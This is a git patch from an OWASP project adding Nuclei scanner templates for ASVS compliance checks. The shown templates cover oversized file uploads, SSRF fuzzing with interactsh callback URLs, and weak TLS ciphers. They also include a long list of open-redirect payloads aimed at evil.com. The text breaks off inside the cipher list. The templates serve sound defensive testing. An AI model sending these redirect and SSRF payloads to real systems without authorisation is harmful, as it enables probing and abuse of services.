From e683faafb424710972ba92efebf762241436247d Mon Sep 17 00:00:00 2001
From: Hamed Salimian
Date: Wed, 11 Sep 2024 16:16:29 +0330
Subject: [PATCH] Implement 9 new Nuclei Templates for ASVS 4.0.3 Compliance Checks (#4)

* Update info.md
  update small details in side bar
* Update index.md
  add Licensing section
* Update index.md
* Update index.md
* Update info.md
  add link to the github repo
* Create README.md
* Create MIT LICENSE
* Update index.md
  Signed-off-by: Dorna Azhirak <42513803+nameddorna@users.noreply.github.com>
* Update index.md
  add project desc
  Signed-off-by: Dorna Azhirak <42513803+nameddorna@users.noreply.github.com>
* Create CONTRIBUTING.md
  add 'how to contribute' file
  Signed-off-by: Dorna Azhirak <42513803+nameddorna@users.noreply.github.com>
* Update and rename tab_example.md to tab_contributing.md
  add contribution guideline on main owasp website of project
  Signed-off-by: Dorna Azhirak <42513803+nameddorna@users.noreply.github.com>
* Update README.md
  add readme file content
  Signed-off-by: Dorna Azhirak <42513803+nameddorna@users.noreply.github.com>
* Update info.md
  edit sidebar add icons
  Signed-off-by: Dorna Azhirak <42513803+nameddorna@users.noreply.github.com>
* Update README.md
  Signed-off-by: Hamed Salimian
* Update README.md
  Signed-off-by: Hamed Salimian
* Create syntax-checking.yml
  Signed-off-by: Hamed Salimian
* Create template-validate.yml
  Signed-off-by: Hamed Salimian
* Create templates folder
  Signed-off-by: Hamed Salimian
* Added static vulnerable project as submodule on dev
* Create 13.2.1.yaml
  Signed-off-by: Hamed Salimian
* Update syntax-checking.yml
  Add PUSH event to workflow
  Signed-off-by: Hamed Salimian
* Update 13.2.1.yaml
  Signed-off-by: Hamed Salimian
* Create .yamllint
  Signed-off-by: Hamed Salimian
* Update template-validate.yml
  add PUSH event to workflow
  Signed-off-by: Hamed Salimian
* Update 13.2.1.yaml
  Fix lint issues.
  Signed-off-by: Hamed Salimian
* Create 9-1-3.yaml
  Signed-off-by: Reza Saeedi
* Update 13.2.1.yaml
  Fix lint issue.
  Signed-off-by: Hamed Salimian
* Update 9-3-1.yaml
  Signed-off-by: Reza Saeedi
* Rename 9-3-1.yaml to 9.1.3.yaml
  Signed-off-by: Reza Saeedi
* Update 13.2.1.yaml
  Edit `id` and `reference`
  Signed-off-by: Hamed Salimian
* Create 14.4.1.yaml
  Create ASVS-4.0.3-V14.4.1 template.
  Signed-off-by: Hamed Salimian
* Update template-validate.yml
  Signed-off-by: Hamed Salimian
* Update template-validate.yml
  Signed-off-by: Hamed Salimian
* Update template-validate.yml
  Signed-off-by: Hamed Salimian
* Update 13.2.1.yaml
  Signed-off-by: Hamed Salimian
* Update 14.4.1.yaml
  Signed-off-by: Hamed Salimian
* Update template-validate.yml
  Signed-off-by: Hamed Salimian
* Update 14.4.1.yaml
  Signed-off-by: Hamed Salimian
* Update 14.4.1.yaml
  Signed-off-by: Hamed Salimian
* Update 14.4.1.yaml
  Signed-off-by: Hamed Salimian
* Update tab_contributing.md
  Signed-off-by: Hamed Salimian
* Create 14.4.2.yaml
  Signed-off-by: Hamed Salimian
* Update 14.4.2.yaml
  Signed-off-by: Hamed Salimian
* Update README.md
  Signed-off-by: Hamed Salimian
* Update tab_contributing.md
  Signed-off-by: Hamed Salimian
* Create 14.4.3.yaml
  Signed-off-by: Hamed Salimian
* Update 14.4.3.yaml
  Signed-off-by: Hamed Salimian
* Create 14.4.4.yaml
  Signed-off-by: Hamed Salimian
* Create 14.4.5.yaml
  Signed-off-by: Hamed Salimian
* Update 14.4.5.yaml
  Signed-off-by: Hamed Salimian
* Create 14.4.6.yaml
  Signed-off-by: Hamed Salimian
* Create 14.4.7.yaml
  Signed-off-by: Hamed Salimian
* Update 13.2.1.yaml
  Signed-off-by: Hamed Salimian
* Update Submodule
* Create 14.5.2.yaml
  Signed-off-by: Hamed Salimian
* Create 14.5.3.yaml
  Signed-off-by: Hamed Salimian
* Update tab_contributing.md
  Signed-off-by: Hamed Salimian
* Update README.md
  Signed-off-by: Hamed Salimian
* Update 13.2.1.yaml
  Signed-off-by: Hamed Salimian
* Create 14.5.1.yaml
  Signed-off-by: Hamed Salimian
* Update 14.5.1.yaml
  Signed-off-by: Hamed Salimian
* Update 13.2.1 14.5.1
* Add 14.3.2 workflow
* Create 14.2.3.yaml
* Update Submodule
* Update 14.2.3.yaml
  Signed-off-by: Hamed Salimian
* Create 13.3.1.yaml
  Signed-off-by: Hamed Salimian
* Update 13.3.1.yaml
  Signed-off-by: Hamed Salimian
* Update template-validate.yml
  Signed-off-by: Hamed Salimian
* Update template-validate.yml
  Signed-off-by: Hamed Salimian
* Update template-validate.yml
  Signed-off-by: Hamed Salimian
* Create 13.2.2.yaml
  Signed-off-by: Hamed Salimian
* Update template-validate.yml
  Signed-off-by: Hamed Salimian
* Update submodule
* Fix reference of 9.1.3.yaml
  Signed-off-by: Hamed Salimian
* Update template-validate.yml
  Signed-off-by: Hamed Salimian
* Update template-validate.yml
  Signed-off-by: Hamed Salimian
* Update tab_contributing.md
  Signed-off-by: Hamed Salimian
* Update tab_contributing.md
  Signed-off-by: Hamed Salimian
* Update README.md
  Signed-off-by: Hamed Salimian
* Create 12.1.1.(2).yaml
* Create 12.1.1.(2).yaml
* Update template-validate.yml
  Signed-off-by: Hamed Salimian
* fix template validation action
* Add workflow templates
* Fix workflows
* Add status badges
  Signed-off-by: Hamed Salimian
* Add status badges.
  Signed-off-by: Hamed Salimian
* Create 12.6.1.yaml
* fix template validation action
* Vulnerable Page Updated.
* Fix status badge
* Update Submodule
* Create 5.1.5.yaml
* fix 5.1.5.yaml
* fix template validation action
* Create 8.2.1.yaml
* Update 8.2.1.yaml
* Update 8.2.1.yaml
* Add logo README.md
  Signed-off-by: Hamed Salimian
* Update Submodule
* Create 12.3.3.yaml
* Add LOGO README.md
  Signed-off-by: Hamed Salimian
* Fix logo alignment
  Signed-off-by: Hamed Salimian
* Create 9.1.2.yaml
* Create 5.5.2.yaml
* Add 5.3.3.1.yaml
* Create 5.3.3.2.yaml
* Update 5.3.3.1.yaml
* Create 5.2.6.yaml & Update 5.5.2.yaml
* Fix 5.2.6.yaml
* Fix 12.6.1.yaml
* Update 12.6.1.yaml
* Update 5.1.5.yaml
  Signed-off-by: AmirHossein Raeisi <96957814+Ahsraeisi@users.noreply.github.com>
* Update 5.2.6.yaml
  Signed-off-by: AmirHossein Raeisi <96957814+Ahsraeisi@users.noreply.github.com>
* Update 5.2.6.yaml
  Signed-off-by: AmirHossein Raeisi <96957814+Ahsraeisi@users.noreply.github.com>
* Update 5.3.3.2.yaml
  Signed-off-by: AmirHossein Raeisi <96957814+Ahsraeisi@users.noreply.github.com>
* Update 5.3.3.2.yaml
  Signed-off-by: AmirHossein Raeisi <96957814+Ahsraeisi@users.noreply.github.com>
* Update 5.5.2.yaml
  Signed-off-by: AmirHossein Raeisi <96957814+Ahsraeisi@users.noreply.github.com>
* Add 12.1.1, 12,3,3, 12,6,1, 5.1.5, 5.3.3 Vulnerable pages
* Update 8.2.1.yaml
  Signed-off-by: AmirHossein Raeisi <96957814+Ahsraeisi@users.noreply.github.com>
* Update 9.1.2.yaml
  Signed-off-by: AmirHossein Raeisi <96957814+Ahsraeisi@users.noreply.github.com>
* Update 12.3.3.yaml
  Signed-off-by: AmirHossein Raeisi <96957814+Ahsraeisi@users.noreply.github.com>
* Update 12.6.1.yaml
  Signed-off-by: AmirHossein Raeisi <96957814+Ahsraeisi@users.noreply.github.com>
* Ajibe
* Ajibe
* Fixed
* Fixed
* Chore: Fix Late night

---------

Signed-off-by: Dorna Azhirak <42513803+nameddorna@users.noreply.github.com>
Signed-off-by: Hamed Salimian
Signed-off-by: Reza Saeedi
Signed-off-by: AmirHossein Raeisi <96957814+Ahsraeisi@users.noreply.github.com>
Co-authored-by: Dorna Azhirak <42513803+nameddorna@users.noreply.github.com>
Co-authored-by: Reza Saeedi
Co-authored-by: AmirHossein Raeisi <96957814+Ahsraeisi@users.noreply.github.com>
---
 .gitmodules | 2 +-
 README.md | 9 +-
 Vulnerable-Pages | 2 +-
 templates/12.1.1.yaml | 64 ++
 templates/12.6.1.yaml | 58 ++
 templates/5.1.5.yaml | 141 ++++
 templates/8.2.1.yaml | 28 +
 templates/9.1.2.yaml | 425 ++++++++++
 templates/9.1.3.yaml | 2 +-
 templates/code/12.1.1.2.yaml | 59 ++
 templates/code/source/zipbomb.py | 768 ++++++++++++++++++
 templates/dast/12.3.3.yaml | 47 ++
 templates/dast/5.2.6.yaml | 106 +++
 templates/dast/5.3.3.2.yaml | 56 ++
 templates/dast/5.5.2.yaml | 62 ++
 templates/headless/5.3.3.1.yaml | 54 ++
 templates/workflows/14.3.2.yaml | 50 +-
 .../exposures/logs/django-debug-exposure.yaml | 33 +
 .../exposures/logs/jboss-seam-debug-page.yaml | 30 +
 .../exposures/logs/pyramid-debug-toolbar.yaml | 31 +
 .../exposures/logs/rails-debug-mode.yaml | 24 +
 .../exposures/logs/struts-debug-mode.yaml | 23 +
 .../exposures/logs/struts-problem-report.yaml | 29 +
 .../airflow/airflow-debug.yaml | 31 +
 .../misconfiguration/aspx-debug-mode.yaml | 38 +
 .../browserless-debugger.yaml | 33 +
 .../misconfiguration/debug/ampache-debug.yaml | 34 +
 .../misconfiguration/debug/bottle-debug.yaml | 36 +
 .../misconfiguration/django-debug-detect.yaml | 29 +
 .../laravel-debug-enabled.yaml | 31 +
 .../misconfiguration/laravel-debug-error.yaml | 26 +
 .../laravel-debug-infoleak.yaml | 53 ++
 .../php-debugbar-exposure.yaml | 34 +
 .../misconfiguration/php-errors.yaml | 47 ++
 .../rekognition-image-validation.yaml | 35 +
 .../misconfiguration/sitecore-debug-page.yaml | 27 +
 .../misconfiguration/struts-ognl-console.yaml | 34 +
 .../misconfiguration/symfony-debug.yaml | 41 +
 .../misconfiguration/typo3-debug-mode.yaml | 31 +
 .../misconfiguration/wamp-xdebug-detect.yaml | 29 +
 .../werkzeug-debugger-detect.yaml | 22 +
 .../jenkins/jenkins-stack-trace.yaml | 32 +
 42 files changed, 2717 insertions(+), 29 deletions(-)
 create mode 100644 templates/12.1.1.yaml
 create mode 100644 templates/12.6.1.yaml
 create mode 100644 templates/5.1.5.yaml
 create mode 100644 templates/8.2.1.yaml
 create mode 100644 templates/9.1.2.yaml
 create mode 100644 templates/code/12.1.1.2.yaml
 create mode 100644 templates/code/source/zipbomb.py
 create mode 100644 templates/dast/12.3.3.yaml
 create mode 100644 templates/dast/5.2.6.yaml
 create mode 100644 templates/dast/5.3.3.2.yaml
 create mode 100644 templates/dast/5.5.2.yaml
 create mode 100644 templates/headless/5.3.3.1.yaml
 create mode 100644 templates/workflows/exposures/logs/django-debug-exposure.yaml
 create mode 100644 templates/workflows/exposures/logs/jboss-seam-debug-page.yaml
 create mode 100644 templates/workflows/exposures/logs/pyramid-debug-toolbar.yaml
 create mode 100644 templates/workflows/exposures/logs/rails-debug-mode.yaml
 create mode 100644 templates/workflows/exposures/logs/struts-debug-mode.yaml
 create mode 100644 templates/workflows/exposures/logs/struts-problem-report.yaml
 create mode 100644 templates/workflows/misconfiguration/airflow/airflow-debug.yaml
 create mode 100644 templates/workflows/misconfiguration/aspx-debug-mode.yaml
 create mode 100644 templates/workflows/misconfiguration/browserless-debugger.yaml
 create mode 100644 templates/workflows/misconfiguration/debug/ampache-debug.yaml
 create mode 100644 templates/workflows/misconfiguration/debug/bottle-debug.yaml
 create mode 100644 templates/workflows/misconfiguration/django-debug-detect.yaml
 create mode 100644 templates/workflows/misconfiguration/laravel-debug-enabled.yaml
 create mode 100644 templates/workflows/misconfiguration/laravel-debug-error.yaml
 create mode 100644 templates/workflows/misconfiguration/laravel-debug-infoleak.yaml
 create mode 100644 templates/workflows/misconfiguration/php-debugbar-exposure.yaml
 create mode 100644 templates/workflows/misconfiguration/php-errors.yaml
create mode 100644 templates/workflows/misconfiguration/rekognition-image-validation.yaml create mode 100644 templates/workflows/misconfiguration/sitecore-debug-page.yaml create mode 100644 templates/workflows/misconfiguration/struts-ognl-console.yaml create mode 100644 templates/workflows/misconfiguration/symfony-debug.yaml create mode 100644 templates/workflows/misconfiguration/typo3-debug-mode.yaml create mode 100644 templates/workflows/misconfiguration/wamp-xdebug-detect.yaml create mode 100644 templates/workflows/technologies/werkzeug-debugger-detect.yaml create mode 100644 templates/workflows/vulnerabilities/jenkins/jenkins-stack-trace.yaml diff --git a/.gitmodules b/.gitmodules index 18feab8..62cddbf 100644 --- a/.gitmodules +++ b/.gitmodules @@ -1,4 +1,4 @@ [submodule "Vulnerable-Pages"] path = Vulnerable-Pages url = https://github.com/Snbig/Vulnerable-Pages - branch = dev + branch = main diff --git a/README.md b/README.md index 3654252..a51d7a9 100644 --- a/README.md +++ b/README.md @@ -1,3 +1,11 @@ +[![❄️ YAML Lint](https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/actions/workflows/syntax-checking.yml/badge.svg)](https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/actions/workflows/syntax-checking.yml) +[![🛠 Template Validate](https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/actions/workflows/template-validate.yml/badge.svg)](https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/actions/workflows/template-validate.yml) +[![Vulnerable Pages](https://img.shields.io/website?labelColor=3D444C&link=https://vulnerable-pages.onrender.com/&label=%F0%9F%8E%AFVulnerable%20Pages&url=https://vulnerable-pages.onrender.com/)](https://vulnerable-pages.onrender.com/) + +

+ +

+ # OWASP ASVS Security Evaluation Templates with Nuclei @@ -23,4 +31,3 @@ For detailed information and guidelines about contributing in developing templat #### Core Team The project current core team are: - [Hamed Salimain](https://github.com/Snbig) (Project Leader) - diff --git a/Vulnerable-Pages b/Vulnerable-Pages index 266f974..9f6162f 160000 --- a/Vulnerable-Pages +++ b/Vulnerable-Pages @@ -1 +1 @@ -Subproject commit 266f9741658e1da4ac76d42e5121f0721063070c +Subproject commit 9f6162ffc8b63d2a3eee3c8c68612e92ebc6283d diff --git a/templates/12.1.1.yaml b/templates/12.1.1.yaml new file mode 100644 index 0000000..60d8604 --- /dev/null +++ b/templates/12.1.1.yaml 
@@ -0,0 +1,64 @@ +id: ASVS-4-0-3-V12-1-1 + +info: + name: ASVS 12.1.1 Check + author: Hamed Salimian + severity: medium + classification: + cwe-id: CWE-400 + reference: + - https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/02-Configuration_and_Deployment_Management_Testing/06-Test_HTTP_Methods + - https://cheatsheetseries.owasp.org/cheatsheets/File_Upload_Cheat_Sheet.html + - https://snbig.github.io/Vulnerable-Pages/ASVS_12_1_1/index.html + tags: asvs,12.1.1 + description: | + Verify that the application will not accept large files that could fill up storage or cause a denial of service. + + +variables: + large_file_size: 10000000 + small_file_size: 100 + file_type: "text/plain" + file_ext: "txt" + +http: + - raw: + - | + POST {{BaseURL}} HTTP/1.1 + Host: {{Hostname}} + Accept: */* + Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryiugABg7zoMAxIKId + + ------WebKitFormBoundaryiugABg7zoMAxIKId + Content-Disposition: form-data; name="file"; filename="{{randstr}}.{{file_ext}}" + Content-Type: {{file_type}} + + {{rand_text_alpha({{small_file_size}})}} + ------WebKitFormBoundaryiugABg7zoMAxIKId-- + + - | + POST {{BaseURL}} HTTP/1.1 + Host: {{Hostname}} + Accept: */* + Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryiugABg7zoMAxIKId + + ------WebKitFormBoundaryiugABg7zoMAxIKId + Content-Disposition: form-data; name="file"; filename="{{randstr}}.{{file_ext}}" + Content-Type: {{file_type}} + + {{rand_text_alpha({{large_file_size}})}} + ------WebKitFormBoundaryiugABg7zoMAxIKId-- + + extractors: + - type: dsl + name: status code of large file upload. + dsl: + - status_code_2 + + matchers: + - type: dsl + name: status_code + condition: and + dsl: + - status_code_2 < 210 && status_code_2 >= 200 + - status_code_2 == status_code \ No newline at end of file diff --git a/templates/12.6.1.yaml b/templates/12.6.1.yaml new file mode 100644 index 0000000..df170e0 --- /dev/null +++ b/templates/12.6.1.yaml 
@@ -0,0 +1,58 @@ +id: ASVS-4-0-3-V12-6-1 + +info: + name: ASVS 12.6.1 Check + author: AmirHossein Raeisi + severity: high + classification: + cwe-id: CWE-918 + reference: + - https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/07-Input_Validation_Testing/19-Testing_for_Server-Side_Request_Forgery + - https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29/ + - https://github.com/projectdiscovery/nuclei-templates/blob/main/dast/vulnerabilities/ssrf/blind-ssrf.yaml + - https://cheatsheetseries.owasp.org/cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html + - https://snbig.github.io/Vulnerable-Pages/ASVS_12_6_1/ + tags: asvs,12.6.1 + description: | + Verify that the web or application server is configured with an allow list of resources or systems to which the server can send requests or load data/files from. + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + ssrf: + - "{{interactsh-url}}" + - "{{FQDN}}.{{interactsh-url}}" + - "{{RDN}}.{{interactsh-url}}" + - "{{FQDN}}@{{interactsh-url}}" + - "{{RDN}}@{{interactsh-url}}" + + fuzzing: + - part: query + mode: single + fuzz: + - "https://{{ssrf}}" + - "{{ssrf}}:80" + + - part: body + mode: single + fuzz: + - "https://{{ssrf}}" + - "{{ssrf}}:80" + + - part: header + mode: single + fuzz: + - "https://{{ssrf}}" + - "{{ssrf}}:80" + + stop-at-first-match: true + matchers: + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http" + - "dns" diff --git a/templates/5.1.5.yaml b/templates/5.1.5.yaml new file mode 100644 index 0000000..6c073bd --- /dev/null +++ b/templates/5.1.5.yaml 
@@ -0,0 +1,141 @@ +id: ASVS-4-0-3-V5-1-5 + +info: + name: ASVS 5.1.5 Check + author: AmirHossein Raeisi + severity: low + classification: + cwe-id: CWE-601 + reference: + - https://cheatsheetseries.owasp.org/cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html + - https://cwe.mitre.org/data/definitions/601.html + - https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/11-Client_Side_Testing/04-Testing_for_Client_Side_URL_Redirect + - https://github.com/projectdiscovery/nuclei-templates/blob/main/http/vulnerabilities/generic/open-redirect-generic.yaml + - https://snbig.github.io/Vulnerable-Pages/ASVS_5_1_5/ + tags: asvs,5.1.5 + description: | + Verify that URL redirects and forwards only allow destinations which appear on an allow list, or show a warning when redirecting to potentially untrusted content. + +variables: + vulnerable_parameter: "url" + +http: + - method: GET + path: + - "{{BaseURL}}/{{payload}}" + - "{{BaseURL}}//{{payload}}" + - "{{BaseURL}}/?{{vulnerable_parameter}}={{payload}}" + - "{{BaseURL}}?{{vulnerable_parameter}}={{payload}}" + + payloads: + payload: + - '%0a/evil.com/' + - '%0d/evil.com/' + - '%00/evil.com/' + - '%09/evil.com/' + - '%5C%5Cevil.com/%252e%252e%252f' + - '%5Cevil.com' + - '%5cevil.com/%2f%2e%2e' + - '%5c{{RootURL}}evil.com/%2f%2e%2e' + - '../evil.com' + - '.evil.com' + - '/%5cevil.com' + - '////\;@evil.com' + - '////evil.com' + - '///evil.com' + - '///evil.com/%2f%2e%2e' + - '///evil.com@//' + - '///{{RootURL}}evil.com/%2f%2e%2e' + - '//;@evil.com' + - '//\/evil.com/' + - '//\@evil.com' + - '//\evil.com' + - '//\tevil.com/' + - '//evil.com/%2F..' + - '//evil.com//' + - '//%69%6e%74%65%72%61%63%74%2e%73%68' + - '//evil.com@//' + - '//evil.com\tevil.com/' + - '//https://evil.com@//' + - '/<>//evil.com' + - '/\/\/evil.com/' + - '/\/evil.com' + - '/\evil.com' + - '/evil.com' + - '/evil.com/%2F..' 
+ - '/evil.com/' + - '/evil.com/..;/css' + - '/https:evil.com' + - '/{{RootURL}}evil.com/' + - '/〱evil.com' + - '/〵evil.com' + - '/ゝevil.com' + - '/ーevil.com' + - '/ーevil.com' + - '<>//evil.com' + - '@evil.com' + - '@https://evil.com' + - '\/\/evil.com/' + - 'evil%E3%80%82com' + - 'evil.com' + - 'evil.com/' + - 'evil.com//' + - 'evil.com;@' + - 'https%3a%2f%2fevil.com%2f' + - 'https:%0a%0devil.com' + - 'https://%0a%0devil.com' + - 'https://%09/evil.com' + - 'https://%2f%2f.evil.com/' + - 'https://%3F.evil.com/' + - 'https://%5c%5c.evil.com/' + - 'https://%5cevil.com@' + - 'https://%23.evil.com/' + - 'https://.evil.com' + - 'https://////evil.com' + - 'https:///evil.com' + - 'https:///evil.com/%2e%2e' + - 'https:///evil.com/%2f%2e%2e' + - 'https:///evil.com@evil.com/%2e%2e' + - 'https:///evil.com@evil.com/%2f%2e%2e' + - 'https://:80#@evil.com/' + - 'https://:80?@evil.com/' + - 'https://:@\@evil.com' + - 'https://:@evil.com\@evil.com' + - 'https://;@evil.com' + - 'https://\tevil.com/' + - 'https://evil.com/evil.com' + - 'https://evil.com/https://evil.com/' + - 'https://www.\.evil.com' + - 'https:/\/\evil.com' + - 'https:/\evil.com' + - 'https:/evil.com' + - 'https:evil.com' + - '{{RootURL}}evil.com' + - '〱evil.com' + - '〵evil.com' + - 'ゝevil.com' + - 'ーevil.com' + - 'ーevil.com' + - 'redirect/evil.com' + - 'cgi-bin/redirect.cgi?evil.com' + - 'out?evil.com' + - 'login?to=http://evil.com' + - '1/_https@evil.com' + - 'redirect?targeturl=https://evil.com' + + redirects: false + matchers-condition: and + stop-at-first-match: true + matchers: + - type: regex + part: header + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)evil\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/idfD2e/1 + - type: status + status: + - 301 + - 302 + - 303 + - 304 + - 307 + - 308 diff --git a/templates/8.2.1.yaml b/templates/8.2.1.yaml new file mode 100644 index 0000000..83002bb --- /dev/null +++ b/templates/8.2.1.yaml 
@@ -0,0 +1,28 @@ +id: ASVS-4-0-3-V8-2-1 + +info: + name: ASVS 8.2.1 Check + author: AmirHossein Raeisi + severity: info + classification: + cwe-id: CWE-525 + reference: + - https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/04-Authentication_Testing/06-Testing_for_Browser_Cache_Weaknesses + - https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Cache-Control + tags: asvs,8.2.1 + description: | + Verify the application sets sufficient anti-caching headers so that sensitive data is not cached in modern browsers. + +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + stop-at-first-match: true + matchers: + - type: regex + part: header + regex: + - '(?i)cache-control:.*no-store' + negative: true diff --git a/templates/9.1.2.yaml b/templates/9.1.2.yaml new file mode 100644 index 0000000..5170641 --- /dev/null +++ b/templates/9.1.2.yaml 
@@ -0,0 +1,425 @@ +id: ASVS-4-0-3-V9-1-2 + +info: + name: ASVS 9.1.2 Check + author: AmirHossein Raeisi + severity: Low + classification: + cwe-id: CWE-918 + reference: + - https://www.acunetix.com/vulnerabilities/web/tls-ssl-weak-cipher-suites/ + - https://github.com/projectdiscovery/nuclei-templates/blob/main/ssl/insecure-cipher-suite-detect.yaml + - https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/09-Testing_for_Weak_Cryptography/01-Testing_for_Weak_Transport_Layer_Security + - https://cheatsheetseries.owasp.org/cheatsheets/Transport_Layer_Security_Cheat_Sheet.html + tags: asvs,9.1.2 + description: | + Verify using up to date TLS testing tools that only strong cipher suites are enabled, with the strongest cipher suites set as preferred. + +ssl: + - address: "{{Host}}:{{Port}}" + min_version: tls10 + max_version: tls10 + + extractors: + - type: dsl + dsl: + - "tls_version, cipher" + matchers: + - type: word + part: cipher + words: + - "TLS_DHE_PSK_WITH_NULL_SHA384" + - "TLS_DH_anon_WITH_CAMELLIA_128_CBC_SHA" + - "TLS_DH_anon_WITH_AES_128_GCM_SHA256" + - "TLS_NULL_WITH_NULL_NULL" + - "TLS_DH_DSS_WITH_DES_CBC_SHA" + - "TLS_ECDH_RSA_WITH_NULL_SHA" + - "TLS_DH_anon_EXPORT_WITH_RC4_40_MD5" + - "TLS_DH_anon_WITH_AES_256_CBC_SHA" + - "TLS_DH_anon_WITH_ARIA_128_CBC_SHA256" + - "TLS_RSA_WITH_RC4_128_MD5" + - "TLS_SM4_CCM_SM3" + - "TLS_DH_anon_WITH_CAMELLIA_256_GCM_SHA384" + - "TLS_RSA_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_ECDH_RSA_WITH_RC4_128_SHA" + - "TLS_KRB5_EXPORT_WITH_DES_CBC_40_MD5" + - "TLS_RSA_PSK_WITH_RC4_128_SHA" + - "TLS_GOSTR341112_256_WITH_MAGMA_CTR_OMAC" + - "TLS_DH_anon_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_DH_anon_WITH_ARIA_256_GCM_SHA384" + - "TLS_DHE_PSK_WITH_NULL_SHA256" + - "TLS_ECDHE_PSK_WITH_RC4_128_SHA" + - "TLS_PSK_WITH_RC4_128_SHA" + - "TLS_DHE_PSK_WITH_RC4_128_SHA" + - "TLS_KRB5_WITH_DES_CBC_SHA" + - "TLS_DH_anon_WITH_CAMELLIA_256_CBC_SHA" + - "TLS_DH_anon_WITH_CAMELLIA_256_CBC_SHA256" + - 
"TLS_PSK_WITH_NULL_SHA" + - "TLS_RSA_EXPORT_WITH_RC4_40_MD5" + - "TLS_DH_anon_WITH_RC4_128_MD5" + - "TLS_ECDHE_ECDSA_WITH_NULL_SHA" + - "TLS_DH_anon_WITH_CAMELLIA_128_CBC_SHA256" + - "TLS_RSA_WITH_NULL_MD5" + - "TLS_SHA384_SHA384" + - "TLS_SHA256_SHA256" + - "TLS_DH_anon_WITH_AES_256_GCM_SHA384" + - "TLS_RSA_WITH_NULL_SHA256" + - "TLS_KRB5_EXPORT_WITH_DES_CBC_40_SHA" + - "TLS_RSA_WITH_DES_CBC_SHA" + - "TLS_KRB5_EXPORT_WITH_RC2_CBC_40_SHA" + - "TLS_PSK_WITH_NULL_SHA384" + - "TLS_DH_DSS_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_KRB5_WITH_RC4_128_MD5" + - "TLS_DH_anon_WITH_AES_128_CBC_SHA" + - "TLS_DHE_PSK_WITH_NULL_SHA" + - "TLS_DH_anon_WITH_ARIA_256_CBC_SHA384" + - "TLS_DH_anon_WITH_DES_CBC_SHA" + - "TLS_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_DH_anon_WITH_SEED_CBC_SHA" + - "TLS_DH_anon_WITH_AES_256_CBC_SHA256" + - "TLS_DHE_DSS_WITH_DES_CBC_SHA" + - "TLS_PSK_WITH_NULL_SHA256" + - "TLS_ECDH_ECDSA_WITH_RC4_128_SHA" + - "TLS_ECDH_anon_WITH_AES_128_CBC_SHA" + - "TLS_ECDHE_PSK_WITH_NULL_SHA" + - "TLS_ECDH_anon_WITH_NULL_SHA" + - "TLS_ECDH_anon_WITH_AES_256_CBC_SHA" + - "TLS_KRB5_WITH_IDEA_CBC_MD5" + - "TLS_GOSTR341112_256_WITH_KUZNYECHIK_CTR_OMAC" + - "TLS_ECDHE_RSA_WITH_NULL_SHA" + - "TLS_GOSTR341112_256_WITH_28147_CNT_IMIT" + - "TLS_RSA_PSK_WITH_NULL_SHA" + - "TLS_DH_RSA_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_KRB5_WITH_DES_CBC_MD5" + - "TLS_KRB5_EXPORT_WITH_RC4_40_SHA" + - "TLS_DH_anon_WITH_ARIA_128_GCM_SHA256" + - "TLS_SM4_GCM_SM3" + - "TLS_ECDHE_PSK_WITH_NULL_SHA384" + - "TLS_ECDHE_ECDSA_WITH_RC4_128_SHA" + - "TLS_ECDH_anon_WITH_3DES_EDE_CBC_SHA" + - "TLS_KRB5_EXPORT_WITH_RC4_40_MD5" + - "TLS_DH_anon_WITH_3DES_EDE_CBC_SHA" + - "TLS_RSA_PSK_WITH_NULL_SHA256" + - "TLS_ECDHE_PSK_WITH_NULL_SHA256" + - "TLS_RSA_EXPORT_WITH_RC2_CBC_40_MD5" + - "TLS_DH_RSA_WITH_DES_CBC_SHA" + - "TLS_ECDHE_RSA_WITH_RC4_128_SHA" + - "TLS_ECDH_anon_WITH_RC4_128_SHA" + - "TLS_DHE_DSS_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_DHE_RSA_WITH_DES_CBC_SHA" + - "TLS_RSA_WITH_RC4_128_SHA" + - 
